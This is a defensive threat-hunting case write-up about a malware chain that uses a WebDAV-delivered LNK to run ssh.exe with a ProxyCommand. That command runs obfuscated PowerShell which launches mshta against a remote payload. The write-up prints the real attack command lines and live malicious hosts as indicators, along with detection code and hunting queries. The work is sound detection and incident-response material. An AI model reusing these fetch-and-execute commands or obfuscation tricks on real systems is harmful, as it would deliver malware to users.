# Hunter-Case-01 - SSH Proxy Command Lolbas

## Client-Side Exploitation: abusing WebDAV+URL+LNK to Deliver Malicious Payloads

## 1.) Information

<mark style="color:blue;">**Hunter Blue's**</mark> day started with an interesting case: an infection we first saw on one device and later on many others, which the XDR system neither prevented nor detected or alerted on.

<mark style="color:red;">**This is the reason why you should**</mark> check the initial entry point of a malware infection and not rely blindly on EDR or XDR system detections alone.

Investigate the initial entry and execution, then search the logs for these IoCs / IoAs to find the right artifacts for threat hunting.

### 1.1) Information Links and Research

* Lolbas SSH Option to use ProxyCommand: <https://lolbas-project.github.io/lolbas/Binaries/Ssh/>
* SSH Option to use ProxyCommand: <https://man.openbsd.org/ssh>
* Dynamic malware analysis of such files, uploaded earlier by other infected companies: <https://any.run/report/39fcf6143a801de8acba009ef69ac4f7b533d8e1b91337547ca578f2b7117534/11a68474-4e9a-4070-9b23-b8d244c9fc02>
* <https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/search-spoof-abuse-of-windows-search-to-redirect-to-malware/>
* <https://www.oneconsult.com/en/blog/digital-forensics/batch-file-obfuscation-incident/>
* <https://trustedsec.com/blog/oops-i-udld-it-again>
* Further research: <https://any.run/cybersecurity-blog/client-side-exploitation/>
* The most thorough research on the same case we saw: <https://cyble.com/blog/threat-actor-targets-manufacturing-industry-with-malware/>

## 2.) Attack Chain

<figure><img src="/files/Tba441Ymab29ZPrpDfQm" alt=""><figcaption></figcaption></figure>

## Other Seen Infection Chains from our Cases

<figure><img src="/files/yvPQ4G2wjUr3O0HKmDxE" alt=""><figcaption></figcaption></figure>

## 3.) Initial Access

<mark style="color:red;">**UPDATE 06122024: What we have seen in our SOC in this case is that the user was browsing the internet searching for manuals, found a PDF link, clicked on it and thereby started the initial infection chain.**</mark>

Infection chain where a user first downloaded an LNK file (via the rundll32.exe WebDAV method).

<figure><img src="/files/jtOHdghMAH9OJWv63CIU" alt=""><figcaption></figcaption></figure>

The LNK file will run ssh.exe (C:\Windows\System32\OpenSSH\ssh.exe) with the following parameter:

```text
-o ProxyCommand="powershell powershell -Command ('msh]]]]]]]t]]]]]]]a.e]]]]]]x]]]]]]e ]]]]]]h]]]]]tt]]]]]]p]]]]]s:]]]]]]/]]]]]]]/berb.f]]]]]it]]]]]n]]]]]]]e]]]]]]]ssclu]]]]]]]b]]]]]]]-]]]]]f]]]]]]il]]]]]m]]]]]]fan]]]]]atics]]]]].co]]]]]]m]]]]]/]]]]]]z.]]]]]]]m]]]]]p]]]]]]]4]]]]]]' -replace ']')"
```

* Obfuscated PowerShell

  <figure><img src="/files/I7Y8tEub1y7oWiz30lDg" alt=""><figcaption></figcaption></figure>

The PowerShell command will spawn mshta.exe, thus downloading and executing additional code on the host:

mshta.exe **hxxps\[:]//berb.fitnessclub-filmfanatics.com/z\[.]mp4**

* Malicious mp4 File Downloaded

  <figure><img src="/files/RcLdkH1BNz5khhPkWGTy" alt=""><figcaption></figcaption></figure>

```text
# rundll32.exe downloading the LNK file over WebDAV
rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie download-695-18112-001-webdav-logicaldoc.cdn-serveri4731-ns.shop@SSL https://download-695-18112-001-webdav-logicaldoc.cdn-serveri4731-ns.shop/Downloads/18112.2022/Instruction_695-18121-002_Rev.PDF.lnk

# LNK file target
Windows\System32\OpenSSH\ssh.exe -o ProxyCommand=".....

# which executes:

# PowerShell obfuscated command
Process : C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Started with CMD : powershell powershell -Command ('msh]]]]]]]t]]]]]]]a.e]]]]]]x]]]]]]e ]]]]]]h]]]]]tt]]]]]]p]]]]]s:]]]]]]/]]]]]]]/berb.f]]]]]it]]]]]n]]]]]]]e]]]]]]]ssclu]]]]]]]b]]]]]]]-]]]]]f]]]]]]il]]]]]m]]]]]]fan]]]]]atics]]]]].co]]]]]]m]]]]]/]]]]]]z.]]]]]]]m]]]]]p]]]]]]]4]]]]]]'  -replace ']')

# Deobfuscated command
Process : C:\Windows\System32\mshta.exe Started with CMD : "C:\WINDOWS\system32\mshta.exe" https://berb.fitnessclub-filmfanatics.com/z.mp4
```

## 4.) Finding through Threat Hunting

* The PowerShell script was blocked by the XDR system, but if you trust only this event you will not find the golden information behind this attack.
* We hunted through the data lake logs of the whole infrastructure and, **yes, you guessed it right**, we found another host executing the same chain to download the malicious file from this WebDAV server. Nothing was detected or blocked until the obfuscated PowerShell execution.

## 5.) Mitigation

* The initial breach may occur via spam emails.
  * Limit email attachments to known and legitimate file types (whitelisting, not blacklisting) on the email gateway.
* <mark style="color:red;">**UPDATE 06122024: What we have seen in our SOC in this case is that the user was browsing the internet searching for manuals, found a PDF link, clicked on it and thereby started the initial infection chain.**</mark>
  * Therefore awareness training is essential in your company to teach your users in an easy way how such malicious operations are executed (run some fun awareness campaigns so that your users learn something, and do not blame them, as they do not know these attacks ;) ).
* Attack Surface Reduction rules for applications, to cut the execution chain of malicious files.
* Application Control to block malicious executions, or next-gen WDAC.
  * <https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/appcontrol-and-applocker-overview>
  * <https://www.ninjaone.com/blog/understanding-windows-defender-application-control-wdac/#:~:text=Key%20features%20of%20WDAC&text=By%20strictly%20adhering%20to%20application,infections%20and%20other%20security%20breaches.>
* Monitor for WebDAV requests: WebDAV runs over HTTP, so blocking outbound SMB does not reduce this attack.
  * Consider disabling the execution of shortcut files (.lnk) originating from remote locations, such as WebDAV links, or implementing policies that require explicit user consent before executing such files.
* **Exercise Caution:** Only download and open files from trusted and verified sources.
* **Check File Extensions:** Ensure files have appropriate extensions before opening (e.g., .pdf for PDFs).
* **Report Suspicious Activity:** If you encounter unexpected files or activities, report them immediately for further investigation.

## 6.) Detection and Hunting

* Hunt for malicious "ProxyCommand=" values within the SSH arguments.
* Hunting for `davclnt.dll,DavSetCookie` download commands should definitely be done in your environment (see the executed command above).
* My colleague from the Incident Response Team also explained it in his blog post: <https://dfir.ch/posts/search-ms_protocol_handler/>, if you want to check how such commands are misused by threat actors.
* Specific indicators include the use of the search-ms URI protocol in HTML files, unexpected pop-ups requesting access to Windows Explorer, and subsequent attempts to access remote servers using the WebDAV protocol.
* Monitoring for the creation or execution of LNK files pointing to batch scripts should also be a focus.
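To make the hunting ideas in this section and the chain in section 3 concrete, here is an added Python example (it is not part of the original case write-up) that walks a handful of constructed process-creation events modelled on that chain: it undoes the `('…' -replace ']')` trick the same way PowerShell would, then flags `rundll32.exe` calling `davclnt.dll,DavSetCookie` (extracting the WebDAV host and whether it used `@SSL` or a plain `@80` port), `ssh.exe` started with a `ProxyCommand=` option, and `mshta.exe` fetching a remote URL. The event field names (`image`, `parent`, `cmdline`) and the hosts `webdav.example.invalid` and `bastion.example.invalid` are assumptions of mine; the WebDAV domain and the mshta URL are the ones quoted on this page.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import urlparse

# The obfuscated PowerShell literal, rebuilt with shorter ']' runs than the real sample.
# PowerShell's -replace strips the ']' characters at run time, which yields the mshta call.
OBFUSCATED_PS = ("powershell powershell -Command ('msh]]]t]]]a.e]]x]]e ]]h]]tt]]p]]s:]]/]]/berb.f]]it]]n]]e]]"
                 "ssclu]]b]]-]]f]]il]]m]]fan]]atics]].co]]m]]/]]z.]]m]]p]]4]]' -replace ']')")

# Constructed sample events. Field names are my own, not a specific EDR schema; the
# .invalid hosts are made up, the other domains are the IoCs quoted on this page.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\WINDOWS\system32\rundll32.exe", "parent": r"C:\Windows\system32\svchost.exe",
     "cmdline": r"rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie "
                r"download-695-18112-001-webdav-logicaldoc.cdn-serveri4731-ns.shop@SSL "
                r"https://download-695-18112-001-webdav-logicaldoc.cdn-serveri4731-ns.shop/Downloads/18112.2022/Instruction_695-18121-002_Rev.PDF.lnk"},
    {"image": r"C:\Windows\System32\OpenSSH\ssh.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'C:\Windows\System32\OpenSSH\ssh.exe -o ProxyCommand="' + OBFUSCATED_PS + '"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\OpenSSH\ssh.exe", "cmdline": OBFUSCATED_PS},
    {"image": r"C:\WINDOWS\system32\mshta.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\WINDOWS\system32\mshta.exe" https://berb.fitnessclub-filmfanatics.com/z.mp4'},
    # Same technique over plain HTTP (@80 instead of @SSL), host is a placeholder.
    {"image": r"C:\WINDOWS\system32\rundll32.exe", "parent": r"C:\Windows\system32\svchost.exe",
     "cmdline": r"rundll32.exe C:\WINDOWS\system32\davclnt.dll,DavSetCookie webdav.example.invalid@80 "
                r"http://webdav.example.invalid/share/Invoice.pdf.lnk"},
    # Benign control events: ordinary ssh use and a normal rundll32 call must stay quiet.
    {"image": r"C:\Windows\System32\OpenSSH\ssh.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"ssh.exe -o StrictHostKeyChecking=yes admin@bastion.example.invalid"},
    {"image": r"C:\WINDOWS\system32\rundll32.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
]

# ('<literal>' -replace '<junk>'): only the single-quoted form seen in this case is handled.
REPLACE_TRICK = re.compile(r"\(\s*'(?P<body>[^']*)'\s*-replace\s*'(?P<junk>[^']*)'\s*\)", re.IGNORECASE)
WEBDAV_COOKIE = re.compile(r"davclnt\.dll\s*,\s*DavSetCookie\s+(?P<host>[^\s@]+)@(?P<port>SSL|\d+)", re.IGNORECASE)
PROXY_COMMAND = re.compile(r"-o\s*ProxyCommand\s*=", re.IGNORECASE)
REMOTE_URL = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    host: Optional[str]   # network indicator to pivot on, if the rule yields one
    detail: str


def normalize_powershell(cmdline: str) -> str:
    """Undo the ('...' -replace 'X') trick the way PowerShell would: -replace is a regex
    operator (case-insensitive), so the junk pattern is applied as a regex, literal fallback."""
    def _decode(m) -> str:
        body, junk = m.group("body"), m.group("junk")
        try:
            return re.sub(junk, "", body, flags=re.IGNORECASE)
        except re.error:
            return body.replace(junk, "")
    return REPLACE_TRICK.sub(_decode, cmdline)


def hunt(event: Dict[str, str]) -> List[Finding]:
    """Apply the hunting ideas from this page to one process-creation event."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmdline"]
    decoded = normalize_powershell(cmd)
    findings: List[Finding] = []
    if image == "rundll32.exe":
        m = WEBDAV_COOKIE.search(cmd)
        if m:  # @SSL and @<port> both count; the port tells you HTTPS vs plain HTTP
            findings.append(Finding("webdav_davsetcookie", m.group("host").lower(), "port=" + m.group("port")))
    if image == "ssh.exe" and PROXY_COMMAND.search(cmd):
        findings.append(Finding("ssh_proxycommand_lolbas", None, decoded))
    if image in ("powershell.exe", "pwsh.exe") and decoded != cmd:
        findings.append(Finding("powershell_replace_obfuscation", None, decoded))
    if "mshta" in decoded.lower():
        m = REMOTE_URL.search(decoded)
        if m:
            findings.append(Finding("mshta_remote_payload", urlparse(m.group(0)).hostname, m.group(0)))
    return findings


def hunt_all(events: List[Dict[str, str]]) -> List[Finding]:
    return [f for e in events for f in hunt(e)]


def summarize(findings: List[Finding]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


def suspicious_hosts(findings: List[Finding]) -> List[str]:
    """Hosts to pivot on in proxy, DNS and WebClient logs across the rest of the estate."""
    return sorted({f.host for f in findings if f.host})


if __name__ == "__main__":
    found = hunt_all(SAMPLE_EVENTS)
    for f in found:
        print(f"{f.rule:32} host={f.host} {f.detail}")
    print("pivot hosts:", suspicious_hosts(found))
```

The `suspicious_hosts` output is the list you would carry into the data-lake hunt described in section 4: every WebDAV or mshta host pulled out of one endpoint's events becomes a search term for the whole estate, which is exactly how the second infected host in this case was found.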

### 6.1) Sigma Rules

* <https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml>

### 6.2) Yara Rules

* <https://any.run/cybersecurity-blog/client-side-exploitation/>

<figure><img src="/files/eHUVlorjbX8dGS0RPcup" alt=""><figcaption></figcaption></figure>

### 6.3) Hunting Queries Tanium

```text
# These queries find processes where rundll32.exe is used to execute davclnt.dll, often associated with WebDAV activity.
# Parent process seen in this case: C:\Windows\system32\svchost.exe -k LocalService -p -s WebClient
Get Trace Executed Processes[1 month,1654090734975|1654094333975,1,0,100,0,"","(?i).*svchost.exe","(?i).*rundll32.exe.*DavSetCookie.*","","",""] from all machines with Is Windows contains true
Get Trace Executed Processes[1 month,1654090734975|1654094333975,1,0,100,0,"","(?i).*svchost.exe","(?i).*rundll32.exe.*davclnt.dll.*","","",""] from all machines with Is Windows contains true
```

### 6.4) Hunting Queries Defender XDR

```kusto
// This query detects processes where rundll32.exe is used to execute davclnt.dll, often associated with WebDAV activity.
// Use it also without @SSL and with @80 in the command line.
DeviceProcessEvents
| where ProcessCommandLine contains 'rundll32.exe' and ProcessCommandLine contains 'davclnt.dll'
| where ProcessCommandLine contains "@SSL"
| project Timestamp, DeviceName, AccountName, AccountUpn, InitiatingProcessCommandLine, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessFolderPath, ProcessCommandLine, FolderPath, FileName

// Same hunt keyed on the image name instead of the command line.
// Use it also without @SSL and with @80 in the command line.
DeviceProcessEvents
| where FileName == "rundll32.exe"
| where ProcessCommandLine contains "davclnt.dll"
| where ProcessCommandLine contains "@SSL"
| project Timestamp, DeviceName, AccountName, AccountUpn, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessFolderPath, ProcessCommandLine, FolderPath, FileName

// Narrowed variant: exclude your known internal WebDAV server ("Interner-Server" is a placeholder)
// and focus on CDN-fronted hosts. Use it also without @SSL and with @80 in the command line.
DeviceProcessEvents
| where FileName == "rundll32.exe"
| where ProcessCommandLine contains "davclnt.dll"
| where ProcessCommandLine !contains "Interner-Server"
| where ProcessCommandLine contains "cloudflare"
| where ProcessCommandLine contains "@SSL"
| project Timestamp, DeviceName, AccountName, AccountUpn, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessFolderPath, ProcessCommandLine, FolderPath, FileName
```

## 7.) Conclusion and Learning for a Hunter Blue

* The EDR on this host didn't pick up the malicious WebDAV commands, showcasing how fruitful **threat hunting** can be.
